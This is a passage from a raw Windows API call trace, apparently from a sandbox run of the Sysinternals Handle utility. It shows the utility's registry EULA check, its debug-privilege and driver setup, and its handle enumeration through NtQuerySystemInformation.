¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0195.777] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x12f9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0195.777] GetLastError () returned 0x0 [0195.777] SetLastError (dwErrCode=0x0) [0195.777] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0195.777] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f8c0, cbMultiByte=256, lpWideCharStr=0x12f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0195.777] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0195.777] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x12f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0195.777] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x12fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0195.777] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x100) returned 0x3412c0 [0195.778] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140010890) returned 0x0 [0195.778] RtlSizeHeap (HeapHandle=0x320000, Flags=0x0, MemoryPointer=0x3412c0) returned 0x100 [0195.779] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77940000 [0195.779] GetProcAddress (hModule=0x77940000, lpProcName="IsWow64Process") returned 0x779491d0 [0195.779] GetCurrentProcess () returned 0xffffffffffffffff [0195.779] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x12fef0 | out: Wow64Process=0x12fef0) returned 1 [0195.779] GetLastError () returned 0x0 [0195.779] SetLastError (dwErrCode=0x0) [0195.779] GetLastError () returned 0x0 [0195.780] SetLastError (dwErrCode=0x0) [0195.780] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x0) returned 0x2 [0195.780] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x7c) returned 0x0 [0195.780] RegQueryValueExW (in: hKey=0x7c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x12fc40, lpcbData=0x12fc48*=0x4 | out: lpType=0x0, lpData=0x12fc40*=0x0, lpcbData=0x12fc48*=0x4) returned 0x2 [0195.780] RegCloseKey (hKey=0x7c) returned 0x0 [0195.780] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x7c) returned 0x0 [0195.780] RegQueryValueExW (in: hKey=0x7c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x12fc40, lpcbData=0x12fc48*=0x4 | out: lpType=0x0, lpData=0x12fc40*=0x1, lpcbData=0x12fc48*=0x4) returned 0x0 [0195.781] RegCloseKey (hKey=0x7c) returned 0x0 [0195.781] GetLastError () returned 0x0 [0195.781] SetLastError (dwErrCode=0x0) [0195.781] GetLastError () returned 0x0 [0195.781] SetLastError (dwErrCode=0x0) [0195.781] RegCreateKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", phkResult=0x12fc38 | out: phkResult=0x12fc38*=0x7c) returned 0x0 [0195.781] RegSetValueExW (in: hKey=0x7c, lpValueName="EulaAccepted", Reserved=0x0, dwType=0x4, lpData=0x12fc30*=0x1, cbData=0x4 | out: lpData=0x12fc30*=0x1) returned 0x0 [0195.781] RegCloseKey (hKey=0x7c) returned 0x0 [0195.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x0) returned 1 [0195.782] GetCurrentProcess () returned 0xffffffffffffffff [0195.782] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12e3e0 | out: TokenHandle=0x12e3e0*=0x7c) returned 1 [0195.782] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12e3e8 | out: lpLuid=0x12e3e8*(LowPart=0x14, HighPart=0)) returned 1 [0197.059] AdjustTokenPrivileges (in: TokenHandle=0x7c, DisableAllPrivileges=0, NewState=0x12e3f0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0197.059] GetLastError () returned 0x0 [0197.059] CloseHandle (hObject=0x7c) returned 1 [0197.059] GetLastError () returned 0x0 [0197.059] SetLastError (dwErrCode=0x0) [0197.059] GetLastError () returned 0x0 [0197.059] SetLastError (dwErrCode=0x0) [0197.059] CreateFileW (lpFileName="\\\\.\\PROCEXP152" (normalized: "\\device\\procexp152"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0197.060] SeCaptureSubjectContext (in: SubjectContext=0xfffff880052b3598 | out: SubjectContext=0xfffff880052b3598) [0197.060] ExGetPreviousMode () returned 0xfffffa8002941001 [0197.060] SePrivilegeCheck (in: RequiredPrivileges=0xfffff880052b35b8, SubjectSecurityContext=0xfffff880052b3598, AccessMode=0x1 | out: RequiredPrivileges=0xfffff880052b35b8) returned 1 [0197.060] SeReleaseSubjectContext (in: SubjectContext=0xfffff880052b3598 | out: SubjectContext=0xfffff880052b3598) [0197.060] IofCompleteRequest (Irp=0xfffffa80034c2ee0, PriorityBoost=0) [0197.061] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.062] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryInformationProcess") returned 0x77ab14a0 [0197.062] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.062] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryInformationThread") returned 0x77ab1560 [0197.062] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.062] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySystemInformation") returned 0x77ab1670 [0197.062] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.062] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySymbolicLinkObject") returned 0x77ab25d0 [0197.063] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.063] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryDirectoryObject") returned 0x77ab2440 [0197.063] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.063] GetProcAddress (hModule=0x77a60000, lpProcName="NtOpenSymbolicLinkObject") returned 0x77ab2310 [0197.063] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.063] GetProcAddress (hModule=0x77a60000, lpProcName="NtOpenDirectoryObject") returned 0x77ab1890 [0197.063] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.063] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryObject") returned 0x77ab1410 [0197.064] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.064] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySection") returned 0x77ab1820 [0197.064] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.064] GetProcAddress (hModule=0x77a60000, lpProcName="RtlInitAnsiString") returned 0x77ab7f80 [0197.064] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.064] GetProcAddress (hModule=0x77a60000, lpProcName="RtlInitUnicodeString") returned 0x77ab5280 [0197.064] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.064] GetProcAddress (hModule=0x77a60000, lpProcName="RtlAnsiStringToUnicodeString") returned 0x77ab4e50 [0197.065] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.065] GetProcAddress (hModule=0x77a60000, lpProcName="RtlFreeUnicodeString") returned 0x77ab5610 [0197.065] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.065] GetProcAddress (hModule=0x77a60000, lpProcName="RtlFreeAnsiString") returned 0x77ab5610 [0197.065] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0197.065] GetProcAddress (hModule=0x77a60000, lpProcName="RtlUnicodeStringToAnsiString") returned 0x77ab5c50 [0197.065] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x0, Length=0x0, ResultLength=0x0 | out: SystemInformation=0x0, ResultLength=0x0) returned 0xc0000004 [0197.065] GetLastError () returned 0x0 [0197.066] SetLastError (dwErrCode=0x0) [0197.066] GetLastError () returned 0x0 [0197.066] SetLastError (dwErrCode=0x0) [0197.066] GetDriveTypeW (lpRootPathName="A:\\") returned 0x1 [0197.066] GetLastError () returned 0x0 [0197.066] SetLastError (dwErrCode=0x0) [0197.066] GetLastError () returned 0x0 [0197.066] SetLastError (dwErrCode=0x0) [0197.066] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0197.067] GetLastError () returned 0x0 [0197.067] SetLastError (dwErrCode=0x0) [0197.067] GetLastError () returned 0x0 [0197.067] SetLastError (dwErrCode=0x0) [0197.067] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.067] GetLastError () returned 0x0 [0197.067] SetLastError (dwErrCode=0x0) [0197.067] GetLastError () returned 0x0 [0197.067] SetLastError (dwErrCode=0x0) [0197.067] RtlInitUnicodeString (in: DestinationString=0x12dac0, SourceString="\\DosDevices\\C:" | out: DestinationString="\\DosDevices\\C:") [0197.067] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x12db00, DesiredAccess=0x20001, ObjectAttributes=0x12db10 | out: SymbolicLinkHandle=0x12db00*=0xc0) returned 0x0 [0197.067] NtQuerySymbolicLinkObject (in: SymLinkObjHandle=0xc0, LinkTarget=0x12dbe0, DataWritten=0x12db08 | out: LinkTarget="\\Device\\HarddiskVolume1", DataWritten=0x12db08) returned 0x0 [0197.067] CloseHandle (hObject=0xc0) returned 1 [0197.067] RtlInitUnicodeString (in: DestinationString=0x12dac0, SourceString="\\Device\\HarddiskVolume1" | out: DestinationString="\\Device\\HarddiskVolume1") [0197.068] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x12db00, DesiredAccess=0x20001, ObjectAttributes=0x12db10 | out: SymbolicLinkHandle=0x12db00*=0x0) returned 0xc0000024 [0197.068] GetLastError () returned 0x0 [0197.068] SetLastError (dwErrCode=0x0) [0197.069] GetLastError () returned 0x0 [0197.069] SetLastError (dwErrCode=0x0) [0197.069] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0197.069] GetLastError () returned 0x0 [0197.069] SetLastError (dwErrCode=0x0) [0197.069] GetLastError () returned 0x0 [0197.069] SetLastError (dwErrCode=0x0) [0197.069] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0197.070] GetLastError () returned 0x0 [0197.070] SetLastError (dwErrCode=0x0) [0197.070] GetLastError () returned 0x0 [0197.070] SetLastError (dwErrCode=0x0) [0197.070] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0197.070] GetLastError () returned 0x0 [0197.070] SetLastError (dwErrCode=0x0) [0197.070] GetLastError () returned 0x0 [0197.070] SetLastError (dwErrCode=0x0) [0197.070] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0197.071] GetLastError () returned 0x0 [0197.071] SetLastError (dwErrCode=0x0) [0197.071] GetLastError () returned 0x0 [0197.071] SetLastError (dwErrCode=0x0) [0197.071] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0197.071] GetLastError () returned 0x0 [0197.071] SetLastError (dwErrCode=0x0) [0197.071] GetLastError () returned 0x0 [0197.071] SetLastError (dwErrCode=0x0) [0197.071] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0197.072] GetLastError () returned 0x0 [0197.072] SetLastError (dwErrCode=0x0) [0197.072] GetLastError () returned 0x0 [0197.072] SetLastError (dwErrCode=0x0) [0197.072] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0197.072] GetLastError () returned 0x0 [0197.072] SetLastError (dwErrCode=0x0) [0197.072] GetLastError () returned 0x0 [0197.073] SetLastError (dwErrCode=0x0) [0197.073] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0197.073] GetLastError () returned 0x0 [0197.073] SetLastError (dwErrCode=0x0) [0197.073] GetLastError () returned 0x0 [0197.073] SetLastError (dwErrCode=0x0) [0197.073] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0197.074] GetLastError () returned 0x0 [0197.074] SetLastError (dwErrCode=0x0) [0197.074] GetLastError () returned 0x0 [0197.074] SetLastError (dwErrCode=0x0) [0197.074] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0197.074] GetLastError () returned 0x0 [0197.074] SetLastError (dwErrCode=0x0) [0197.074] GetLastError () returned 0x0 [0197.074] SetLastError (dwErrCode=0x0) [0197.074] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0197.074] GetLastError () returned 0x0 [0197.074] SetLastError (dwErrCode=0x0) [0197.075] GetLastError () returned 0x0 [0197.075] SetLastError (dwErrCode=0x0) [0197.075] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0197.075] GetLastError () returned 0x0 [0197.075] SetLastError (dwErrCode=0x0) [0197.075] GetLastError () returned 0x0 [0197.075] SetLastError (dwErrCode=0x0) [0197.075] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0197.075] GetLastError () returned 0x0 [0197.076] SetLastError (dwErrCode=0x0) [0197.076] GetLastError () returned 0x0 [0197.076] SetLastError (dwErrCode=0x0) [0197.076] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0197.076] GetLastError () returned 0x0 [0197.076] SetLastError (dwErrCode=0x0) [0197.076] GetLastError () returned 0x0 [0197.076] SetLastError (dwErrCode=0x0) [0197.076] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0197.077] GetLastError () returned 0x0 [0197.077] SetLastError (dwErrCode=0x0) [0197.077] GetLastError () returned 0x0 [0197.077] SetLastError (dwErrCode=0x0) [0197.077] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0197.077] GetLastError () returned 0x0 [0197.077] SetLastError (dwErrCode=0x0) [0197.077] GetLastError () returned 0x0 [0197.078] SetLastError (dwErrCode=0x0) [0197.078] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0197.078] GetLastError () returned 0x0 [0197.078] SetLastError (dwErrCode=0x0) [0197.078] GetLastError () returned 0x0 [0197.078] SetLastError (dwErrCode=0x0) [0197.078] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0197.078] GetLastError () returned 0x0 [0197.079] SetLastError (dwErrCode=0x0) [0197.079] GetLastError () returned 0x0 [0197.079] SetLastError (dwErrCode=0x0) [0197.079] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0197.079] GetLastError () returned 0x0 [0197.079] SetLastError (dwErrCode=0x0) [0197.079] GetLastError () returned 0x0 [0197.079] SetLastError (dwErrCode=0x0) [0197.079] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0197.080] GetLastError () returned 0x0 [0197.080] SetLastError (dwErrCode=0x0) [0197.080] GetLastError () returned 0x0 [0197.080] SetLastError (dwErrCode=0x0) [0197.080] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0197.080] GetLastError () returned 0x0 [0197.080] SetLastError (dwErrCode=0x0) [0197.080] GetLastError () returned 0x0 [0197.081] SetLastError (dwErrCode=0x0) [0197.081] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0197.081] GetLastError () returned 0x0 [0197.081] SetLastError (dwErrCode=0x0) [0197.081] GetLastError () returned 0x0 [0197.081] SetLastError (dwErrCode=0x0) [0197.081] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0197.082] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x4000) returned 0x348b10 [0197.082] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x348b10, Length=0x4000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, ResultLength=0x12e420*=0x6d9a8) returned 0xc0000004 [0197.084] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x348b10 | out: hHeap=0x320000) returned 1 [0197.084] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x8000) returned 0x348b10 [0197.085] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x348b10, Length=0x8000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, ResultLength=0x12e420*=0x6d9a8) returned 0xc0000004 [0197.086] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x348b10 | out: hHeap=0x320000) returned 1 [0197.087] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x10000) returned 0x348b10 [0197.087] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x348b10, Length=0x10000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, ResultLength=0x12e420*=0x6d9a8) returned 0xc0000004 [0197.090] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x348b10 | out: hHeap=0x320000) returned 1 [0197.090] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x20000) returned 0x348b10 [0197.090] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x348b10, Length=0x20000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, ResultLength=0x12e420*=0x6d9a8) returned 0xc0000004 [0197.094] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x348b10 | out: hHeap=0x320000) returned 1 [0197.094] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x40000) returned 0x348b10 [0197.095] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x348b10, Length=0x40000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, ResultLength=0x12e420*=0x6d9a8) returned 0xc0000004 [0197.101] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x348b10 | out: hHeap=0x320000) returned 1 [0197.101] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x80000) returned 0x1d40080 [0197.103] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1d40080, Length=0x80000, ResultLength=0x12e420 | out: SystemInformation=0x1d40080, ResultLength=0x12e420*=0x6ded0) returned 0x0 [0197.583] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x4000) returned 0x348b10 [0197.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x348b10, Length=0x4000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, ResultLength=0x12e420*=0x14928) returned 0xc0000004 [0197.583] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x348b10 | out: hHeap=0x320000) returned 1 [0197.583] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x8000) returned 0x348b10 [0197.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x348b10, Length=0x8000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, ResultLength=0x12e420*=0x14928) returned 0xc0000004 [0197.584] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x348b10 | out: hHeap=0x320000) returned 1 [0197.584] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0xc000) returned 0x348b10 [0197.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x348b10, Length=0xc000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, ResultLength=0x12e420*=0x14928) returned 0xc0000004 [0197.584] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x348b10 | out: hHeap=0x320000) returned 1 [0197.584] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x10000) returned 0x348b10 [0197.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x348b10, Length=0x10000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, ResultLength=0x12e420*=0x14928) returned 0xc0000004 [0197.584] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x348b10 | out: hHeap=0x320000) returned 1 [0197.584] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x14000) returned 0x348b10 [0197.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x348b10, Length=0x14000, ResultLength=0x12e420 | out: SystemInformation=0x348b10, 